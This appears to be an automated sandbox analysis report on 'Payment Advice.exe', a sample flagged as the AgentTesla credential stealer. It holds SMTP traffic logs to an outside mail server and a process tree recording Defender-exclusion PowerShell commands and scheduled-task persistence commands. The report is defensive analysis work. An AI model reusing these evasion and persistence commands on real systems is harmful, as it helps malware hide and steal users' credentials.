                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:36.225358009 CEST5874977194.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:37.676227093 CEST5874977194.100.26.91192.168.2.4421 daud.aptcom.info lost input connection
                                                                                    Apr 18, 2024 18:29:38.070059061 CEST5874977294.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:37 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:38.070211887 CEST49772587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:38.417752981 CEST5874977294.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:38.417949915 CEST49772587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:38.727986097 CEST5874977394.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:29:38 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:29:38.730680943 CEST49773587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:29:38.779934883 CEST5874977294.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:29:39.084141016 CEST5874977394.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:29:39.084424019 CEST49773587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:29:39.444097042 CEST5874977394.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:30:03.636260033 CEST5874977494.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:30:03 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:30:03.636413097 CEST49774587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:30:03.953906059 CEST5874977494.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:30:03.954046965 CEST49774587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:30:04.272480965 CEST5874977494.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:30:13.643069029 CEST5874977694.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:30:13 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:30:13.643198013 CEST49776587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:30:13.830807924 CEST5874977594.100.26.91192.168.2.4220-daud.aptcom.info ESMTP Exim 4.96.2 #2 Thu, 18 Apr 2024 16:30:13 +0000
                                                                                    220-We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Apr 18, 2024 18:30:13.830921888 CEST49775587192.168.2.494.100.26.91EHLO 642294
                                                                                    Apr 18, 2024 18:30:13.969152927 CEST5874977694.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:30:13.969436884 CEST49776587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:30:14.178294897 CEST5874977594.100.26.91192.168.2.4250-daud.aptcom.info Hello 642294 [81.181.57.52]
                                                                                    250-SIZE 52428800
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Apr 18, 2024 18:30:14.178430080 CEST49775587192.168.2.494.100.26.91STARTTLS
                                                                                    Apr 18, 2024 18:30:14.296186924 CEST5874977694.100.26.91192.168.2.4220 TLS go ahead
                                                                                    Apr 18, 2024 18:30:14.526700020 CEST5874977594.100.26.91192.168.2.4220 TLS go ahead


                                                                                    Target ID:0
                                                                                    Start time:18:25:56
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                                    Imagebase:0xa10000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1712393138.0000000004C49000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                                                                                    Imagebase:0x220000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                                                                                    Imagebase:0x220000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:18:25:59
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:18:26:00
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                                    Imagebase:0x850000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124616083.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124616083.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4124616083.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:9
                                                                                    Start time:18:26:01
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    Imagebase:0xd80000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1760226964.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:18:26:02
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                    Imagebase:0x7ff693ab0000
                                                                                    File size:496'640 bytes
                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:18:26:05
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp7ACA.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:18:26:05
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:13
                                                                                    Start time:18:26:05
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe"
                                                                                    Imagebase:0x530000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4124167230.000000000292B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4124167230.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4115682058.0000000000431000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:14
                                                                                    Start time:18:26:11
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x180000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.1852266538.00000000041C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 42%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpA082.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:18
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x3c0000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:18:26:14
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x8d0000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.4125579074.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.4125579074.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:false

                                                                                    Target ID:20
                                                                                    Start time:18:26:21
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x7a0000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.1933792023.0000000003CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:18:26:22
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmpC03F.tmp"
                                                                                    Imagebase:0x350000
                                                                                    File size:187'904 bytes
                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:24
                                                                                    Start time:18:26:22
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:25
                                                                                    Start time:18:26:22
                                                                                    Start date:18/04/2024
                                                                                    Path:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
                                                                                    Imagebase:0x800000
                                                                                    File size:695'304 bytes
                                                                                    MD5 hash:F060B9400A263BEA044A7789EC1D85D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.4125631218.0000000002D9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Has exited:false

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:33
                                                                                      Total number of Limit Nodes:4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q$)"
                                                                                      • API String ID: 0-4031938444
                                                                                      • Opcode ID: 05b045a86d66d814fd62d863d14705d4c479a84376641959b1e5a2dd46ec6b6a
                                                                                      • Instruction ID: fd8804fbf880ad3a40a37ec6dd2b701cf61e97d239a53333d49af6f4d45685f8
                                                                                      • Opcode Fuzzy Hash: 05b045a86d66d814fd62d863d14705d4c479a84376641959b1e5a2dd46ec6b6a
                                                                                      • Instruction Fuzzy Hash: E281C474E042098FDB48DFAAC984AEEFBB6FF88310F14952AD415AB354DB34A905CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7Z/t$RWIK$[[bb
                                                                                      • API String ID: 0-1157992699
                                                                                      • Opcode ID: e775accc79bdf92adeaffc930dc686d8e3991d0dfc4f1e8b384e0cff28cbf339
                                                                                      • Instruction ID: 17af9c088c330b5f3a17d4ca5d5db1ca22967b86bffc4d8b7960f54b17e80681
                                                                                      • Opcode Fuzzy Hash: e775accc79bdf92adeaffc930dc686d8e3991d0dfc4f1e8b384e0cff28cbf339
                                                                                      • Instruction Fuzzy Hash: 6C51F470E0520ACFCB48CFAAC5416AEFFF6BB88310F14D86AD429B7254D7749A418F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: 9825e63b0842fcc3d50fe4367f4552b320d33519fc7b6c88f967278d5e268b80
                                                                                      • Instruction ID: c381b1715f7c6064fed7a26c4e1a82f908e7aaff5dbf409d7b1528e9a904eac4
                                                                                      • Opcode Fuzzy Hash: 9825e63b0842fcc3d50fe4367f4552b320d33519fc7b6c88f967278d5e268b80
                                                                                      • Instruction Fuzzy Hash: C9D137B4E1524AEFEB04CF99C4848AEFBB2FF89340F10D655E411AB215D734AA42CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 110079bd336ca008cdb8f6da3a10fb66c5831f4d66d1b21a4c2b6e4ce4c6521f
                                                                                      • Instruction ID: 25e4dc5b70dc30c61560f7c3858cd3483ca24c4374566adf3dea1f7c536f284e
                                                                                      • Opcode Fuzzy Hash: 110079bd336ca008cdb8f6da3a10fb66c5831f4d66d1b21a4c2b6e4ce4c6521f
                                                                                      • Instruction Fuzzy Hash: 299148B0D15248EFDB08CFE9E58499DFBB2FB8A344F20A51AE416BB224D7719905CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b20ceeec76f980d244f7b357eb296d039cf34163db060dc733d83c84dfea5881
                                                                                      • Instruction ID: d2a5771d7c9086b81f64faa580fe07695ebcbf55670acfb1ee712df1074dd501
                                                                                      • Opcode Fuzzy Hash: b20ceeec76f980d244f7b357eb296d039cf34163db060dc733d83c84dfea5881
                                                                                      • Instruction Fuzzy Hash: 318133B4E10229DFDB04CFA9C8819EEFBB1FB89340F209A6AD411B7214D7759912CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51ea8e2f5953a4b79d5983aea4f944494326be182932526b85a2afbcbb2e3c56
                                                                                      • Instruction ID: 79aa8ad62ca6cbb2c96e116f4292a584bb1e5d34948ed85eaf58437d913c35c9
                                                                                      • Opcode Fuzzy Hash: 51ea8e2f5953a4b79d5983aea4f944494326be182932526b85a2afbcbb2e3c56
                                                                                      • Instruction Fuzzy Hash: 443161B1D057448FE719CF6A88542DEBFF3AFC9300F18C5AAD448AB265DB340945CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
